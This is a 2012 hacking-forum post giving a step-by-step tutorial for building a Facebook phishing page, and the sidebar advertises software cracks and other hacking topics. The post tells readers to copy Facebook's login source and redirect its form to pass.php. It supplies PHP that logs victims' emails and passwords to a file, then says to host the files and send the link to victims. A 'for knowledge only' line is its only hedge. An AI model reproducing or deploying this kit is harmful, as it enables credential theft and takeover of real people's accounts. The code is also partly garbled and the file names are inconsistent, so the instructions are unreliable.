Punjabi Hackers: A new era of hacking
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Search

Display results as :

Rechercher Advanced Search

Keywords

Latest topics
» Diffrent Ways Of Hacking Facebook Account
 How to made your own phishing pages for facebook? I_icon_minitimeSun Feb 26, 2012 7:03 pm by Admin

» How to Install Skype on Ubuntu Linux
 How to made your own phishing pages for facebook? I_icon_minitimeSun Feb 26, 2012 4:32 pm by Admin

» INTERNET DOWNLOAD MANAGER 6.07 CRACK AND PATCH
 How to made your own phishing pages for facebook? I_icon_minitimeSun Feb 26, 2012 1:05 pm by Admin

» AVIRA ANTIVIRUS PREMIUM 2012 12.0.0.888 [FINAL] [CRACK] [SERIAL KEY]
 How to made your own phishing pages for facebook? I_icon_minitimeSun Feb 26, 2012 8:31 am by Admin

» SQL Hacking Part 1
 How to made your own phishing pages for facebook? I_icon_minitimeSun Feb 26, 2012 8:26 am by Admin

» JomSocial ~ Joomla Shell Upload Vulnerability
 How to made your own phishing pages for facebook? I_icon_minitimeSat Feb 25, 2012 10:52 pm by Admin

» Virtual Box Full Download Link
 How to made your own phishing pages for facebook? I_icon_minitimeSat Feb 25, 2012 10:35 pm by Admin

»  How to made your own phishing pages for facebook?
 How to made your own phishing pages for facebook? I_icon_minitimeSat Feb 25, 2012 10:21 pm by Admin

» HAVIJ SQL TOOLS FREE CRACK: [FULL VERSION] [CRACK]
 How to made your own phishing pages for facebook? I_icon_minitimeSat Feb 25, 2012 9:58 pm by Admin

May 2024
MonTueWedThuFriSatSun

Calendar Calendar

Affiliates
free forum

How to made your own phishing pages for facebook?

Go down

How to made your own phishing pages for facebook? Empty How to made your own phishing pages for facebook?

Post  Admin Sat Feb 25, 2012 10:21 pm

Today I will tell you about the famous hacking technique called “Phishing“. In this technique hackers just make a fake page of any website to hack user account , then if user entre his/her account name and password hacker get the account details and hack the account of user.
Before starting i just want to tell you the this information is for only knowlegde not for the practical use.
I will tell you how to create phishing pages for facebook.
Steps to create a phishing page of facebook:======
1. First goto Facebook login page (make sure that the page is loaded completely) and right click and select view source (in firefox) or view source code option in other browsers.
2. Select all ( CTR + A ) and copy all the code and paste it in notepad.
3. Then search(CTR + F) for the keyword action.You can see the code as given below.
action=”https://www.facebook.com/login.php?login_attempt=1″
4. Just change the above code as mentioned below
action=”pass.php”
after changing to pass.php (or anyname.php) just save it in the form facebook.html (anyname.html). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.
5. For creating a php script,just copy the below php code into notepad and save in the format pass.php (name mentioned in action of our phishing page)
<?php
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
echo "
“;
?>
Note:‘https://www.facebook.com‘ is the redirection url,When victim will enter his/her email and password he will redirected to’https://www.facebook.com‘
6. By this step our PHP script is also ready,
7. Now host these 2 files ie,
facebook.html
pass.php
in any of free hosting servers like ripway,drivehq,110 mb or phishing-site.www etc (or any other,just google free hosting).Make sure that these 2 files are in same directory.
8. After hosting you will get a direct link to your phishing page,that is to your facebook.html page.just use this link to access or send phishing page.
9. When anyone tries to login through your phishing page a new html page with name password.html will be automatically created in your hosting directory with the password and username entered there. affraid cheers Twisted Evil Arrow No silent
Admin
Admin
Admin

http://punjabihackers.tk

Back to top Go down

Permissions in this forum:
You cannot reply to topics in this forum